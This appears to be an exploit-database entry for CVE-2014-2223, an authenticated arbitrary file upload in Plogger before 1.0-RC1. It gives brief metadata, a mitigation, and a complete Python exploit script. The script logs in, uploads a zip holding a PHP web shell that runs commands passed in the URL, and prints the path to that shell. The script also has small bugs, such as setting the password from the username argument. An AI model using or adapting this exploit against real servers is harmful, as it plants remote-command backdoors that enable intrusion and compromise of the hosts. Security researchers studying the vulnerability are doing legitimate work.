Plogger Authenticated Arbitrary File Upload

vendor:

Plogger

by:

b0z

7,5

CVSS

HIGH

Arbitrary File Upload

434

CWE

Product Name: Plogger

Affected Version From: Prior to 1.0-RC1

Affected Version To: Prior to 1.0-RC1

Patch Exists: YES

Related CWE: 2014-2223

CPE: plogger

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2014

Plogger Authenticated Arbitrary File Upload

This exploit allows an authenticated user to upload a malicious file to the Plogger application. The exploit creates a poisoned gift, which is a zip file containing a malicious PHP file and a true image file. The malicious file is uploaded to the Plogger application and can be accessed by the attacker.

Mitigation:

Upgrade to Plogger version 1.0-RC1 or later.

Source

Exploit-DB raw data:

#!/usr/bin/env python


# Exploit Title: Plogger Authenticated Arbitrary File Upload
# Date: Feb 2014
# Exploit Author: b0z
# Vendor Homepage: www.plogger.org
# Software Link: www.plogger.org/download
# Version: Plogger prior to 1.0-RC1
# CVE : 2014-2223

import hashlib
import os
import zipfile

import requests
import time
import argparse



def login(session,host,username,password):
    print "[+] Log in"

    session.post('http://%s/plog-admin/plog-upload.php' % host, data={
        "plog_username": username,
        "plog_password": password,
        "action": "log_in"
    })

def upload(session):
    print "[+] Creating poisoned gift"
    ## Write the backdoor
    backdoor = open(magic + '.php', 'w+', buffering = 0)
    backdoor.write("<?php system($_GET['cmd']) ?>")
    backdoor.close

    # Add true image file to block the race condition (mandatory not null)
    image = open(magic + '.png', 'w+', buffering = 0)
    image.write('A')
    image.close

    gift = zipfile.ZipFile(magic + '.zip', mode = 'w')
    gift.write(magic + '.php')
    gift.write(magic + '.png')
    gift.close

    os.remove(magic + '.php')
    os.remove(magic + '.png')

    gift = open(magic + '.zip', 'rb')
    files= { "userfile": ("archive.zip", gift)}
    session.post('http://%s/plog-admin/plog-upload.php' % host, files=files,
        data = {
            "destination_radio":"existing",
            "albums_menu" : "1",
            "new_album_name":"",
            "collections_menu":"1",
            "upload":"Upload"
    })

    os.remove(magic + '.zip')
    print '[+] Here we go ==> http://%s/plog-content/uploads/archive/%s.php' % (host,magic)

if __name__== "__main__":

    parser = argparse.ArgumentParser()
    parser.add_argument("--host"        , help="Remote host",required=True)
    parser.add_argument("--user"        , help="Username",required=True)
    parser.add_argument("--password"    , help="Password",required=True)
    args = parser.parse_args()

    host     = args.host
    username = args.user
    password = args.user

    magic = hashlib.sha1(time.asctime()).hexdigest()

    session = requests.session()
    login(session,host,username,password)
    upload(session)